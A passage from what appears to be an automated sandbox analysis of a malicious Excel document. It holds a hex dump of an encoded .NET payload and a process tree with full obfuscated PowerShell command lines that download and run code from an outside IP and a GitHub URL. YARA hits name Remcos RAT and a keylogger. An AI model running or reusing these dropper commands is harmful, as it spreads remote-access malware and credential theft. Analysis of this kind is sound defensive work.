                                                                                                                                            2024-10-04 09:56:28 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                                                                                                                                            Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                                                                                                                                            2024-10-04 09:56:28 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                                                                                                                                            Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                                                                                                                                            2024-10-04 09:56:28 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                                                                                                                                            Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                                                                                                                                            2024-10-04 09:56:28 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                                                                                                                                            Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                                                                                                                                            2024-10-04 09:56:28 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                                                                                                                                            Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                                                                                                                                            2024-10-04 09:56:28 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                                                                                                                                            Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                                                                                                                                            2024-10-04 09:56:28 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                                                                                                                                            Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                                                                                                                                            2024-10-04 09:56:28 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                                                                                                                                            Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                                                                                                                                            Click to jump to process

                                                                                                                                            Click to jump to process

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Click to jump to process

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:05:55:31
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                            Imagebase:0x13f3d0000
                                                                                                                                            File size:28'253'536 bytes
                                                                                                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:05:55:54
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                            Imagebase:0x13fd40000
                                                                                                                                            File size:13'824 bytes
                                                                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:05:55:56
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                                                                                                                                            Imagebase:0x4a440000
                                                                                                                                            File size:345'088 bytes
                                                                                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:05:55:57
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                                                                                                                                            Imagebase:0x13f0a0000
                                                                                                                                            File size:443'392 bytes
                                                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:8
                                                                                                                                            Start time:05:56:00
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline"
                                                                                                                                            Imagebase:0x13fe50000
                                                                                                                                            File size:2'758'280 bytes
                                                                                                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:9
                                                                                                                                            Start time:05:56:02
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB349.tmp" "c:\Users\user\AppData\Local\Temp\00kppfao\CSC26532048CBB457996C7A8C029DD268B.TMP"
                                                                                                                                            Imagebase:0x13f3b0000
                                                                                                                                            File size:52'744 bytes
                                                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:11
                                                                                                                                            Start time:05:56:06
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS"
                                                                                                                                            Imagebase:0xffe90000
                                                                                                                                            File size:168'960 bytes
                                                                                                                                            MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:12
                                                                                                                                            Start time:05:56:06
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                            Imagebase:0x13f0a0000
                                                                                                                                            File size:443'392 bytes
                                                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:14
                                                                                                                                            Start time:05:56:07
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"
                                                                                                                                            Imagebase:0x13f0a0000
                                                                                                                                            File size:443'392 bytes
                                                                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.457736519.000000001239D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.457736519.000000001239D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.457736519.000000001239D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.457736519.000000001239D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:15
                                                                                                                                            Start time:05:56:13
                                                                                                                                            Start date:04/10/2024
                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                            Wow64 process (32bit):false
